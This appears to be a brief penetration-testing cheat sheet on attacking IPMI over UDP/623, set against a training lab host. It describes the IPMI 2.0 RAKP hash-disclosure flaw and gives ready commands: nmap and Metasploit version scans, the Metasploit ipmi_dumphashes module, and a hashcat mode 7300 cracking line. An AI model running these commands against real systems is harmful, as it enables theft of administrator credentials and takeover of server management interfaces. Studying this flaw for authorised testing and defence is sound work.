IPMI
Port UDP/623
Intelligent Platform Management Interface (IPMI
) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring.
IPMI is typically used in three ways:
Before the OS has booted to modify BIOS settings
When the host is fully powered down
Access to a host after a system failure
Tools
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
Metasploit version scan
use auxiliary/scanner/ipmi/ipmi_version
Flaw
flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.
Hashcat
mode 7300
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
To retrieve IPMI hashes, we can use the Metasploit IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run
Last updated